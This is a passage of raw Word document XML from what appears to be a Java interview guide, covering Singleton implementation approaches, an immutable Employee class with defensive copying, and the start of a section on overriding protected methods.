          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EE5B51"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        singlet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howMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31D9C4" w14:textId="77777777"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88797F5" w14:textId="0A68AE12" w:rsidR="0008038E" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB9225" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422792C" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ingleton enum has a single instance INSTANCE, which is automatically created when the enum class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F5DC2" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ums in Java are thread-safe by default, and this approach handles serialization and reflection issues that may arise with other Singleton implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0CADFA" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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is the simplest and most effective way to implement a Singleton in modern Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B02C6" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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parison of Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63262D2F" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ager Initialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA05A50" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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os</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Simple and thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B57AAB" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The instance is created even if it is not needed, which could be inefficient in some cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412FB029" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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azy Initialization with Double-Checked Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85FE04" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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os</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Thread-safe and instance is created only when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786ED995" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More complex, requires the use of volatile keyword, and involves synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9E2C2E" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ill Pugh Singleton Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211AEB7" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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os</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Thread-safe, efficient, and simple. The class loader handles synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B685953" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Slightly more complex due to the inner static class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37C3DB" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ingleton with Enum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F619F53" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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os</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Most robust and thread-safe. Also handles serialization and reflection issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F29E2E2" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Cannot have any constructor other than private, and may not be suitable for certain use cases where the Singleton instance needs to be created dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1C6A0" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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7A5DCFBF" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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Bill Pugh Singleton Design</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Singleton with Enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the most efficient and thread-safe ways to implement a Singleton pattern in Java. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach is the simplest and most effective, while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bill Pugh</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> design is highly recommended for lazy initialization and thread safety. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Double-Checked Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach is suitable for scenarios where you need to control the instance creation manually but comes with some complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1CA31" w14:textId="6D4D361D" w:rsidR="0029340F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0029340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9A4AB51">
          <v:rect id="_x0000_i1169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3202CC" w14:textId="6382D41A" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CB3525">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc196307525"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write an immutable class in Java</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="14B7DA29" w14:textId="72EF1531" w:rsidR="00336ED2" w:rsidRPr="00CE4B95" w:rsidRDefault="00336ED2" w:rsidP="00191998">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156B71E5"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o</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erializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD0980"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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67624CE3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C950E"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mplement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rializab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65F05D6"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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialVersionUI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L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666FD515"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E6782"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39E5E11C"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empId</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F9C4D1"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03005102"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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dob</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E306D5A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DFF54E"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onstructor to initialize the Employee object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2997C"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empI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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sa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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> do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E571651"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4E000D52"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empI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mpId</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730BF234"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sal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al</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C57B8EA"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dob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Dat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o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Ti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Defensive copy to protect mutable Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5DC4F2"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4594CE1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E75332"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Getter methods for the fields (no setters to ensure immutability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656F5797"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get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B801F0F"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7D346F2B"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F99B40A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269CC15F"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getEmpI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6B315E7"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empId</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5C2830"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D7EC183"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D26CAC"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getSa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D9FD128"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sal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2727E118"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FF32F69"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E92E1"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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getDo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005A360"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Dat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o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Ti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Defensive copy to avoid external modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359410F" w14:textId="77777777"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817F268" w14:textId="4C89F661" w:rsidR="00336ED2" w:rsidRPr="00CE4B95"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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDBE18E" w14:textId="77777777" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7B07" w:rsidP="00D6279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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4468D73B" w14:textId="77777777" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7B07" w:rsidP="00D627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nal Class:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Employee class is final to prevent subclassing, ensuring that its immutability is not compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0515D9B0" w14:textId="77777777" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7B07" w:rsidP="00D627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nal Fields:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> All instance fields (name, empId, sal, dob) are final, ensuring that they can only be assigned once, during object construction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324CF3F4" w14:textId="77777777" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7B07" w:rsidP="00D627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Setters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> There are no setter methods, ensuring that the fields cannot be modified after the object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D37A843" w14:textId="77777777" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7B07" w:rsidP="00D627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fensive Copying for Date: Since Date is mutable, a defensive copy is made in the constructor (new Date(dob.getTime())) and when accessing it via the getter (new Date(dob.getTime())), to prevent the internal dob field from being changed externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EFD43" w14:textId="77777777" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7B07" w:rsidP="00D627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makes the Employee class immutable, and its state cannot be changed once the object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AA00D" w14:textId="115EFDCB" w:rsidR="00FC7B07" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00336ED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8C10EBC">
          <v:rect id="_x0000_i1170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5873221F" w14:textId="43F1EAC1" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="005C1948">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc196307526"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we override the protected method</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="4EB72CD1" w14:textId="61A438B1" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00AB7C69">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 we can override a protected method in Java, but there are some important points to consider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F3C98" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461FF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Understanding protected Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690477EC" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461F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protected method in Java is one that can be accessed within the same package or by subclasses, even if the subclass is in a different package.</w:t>
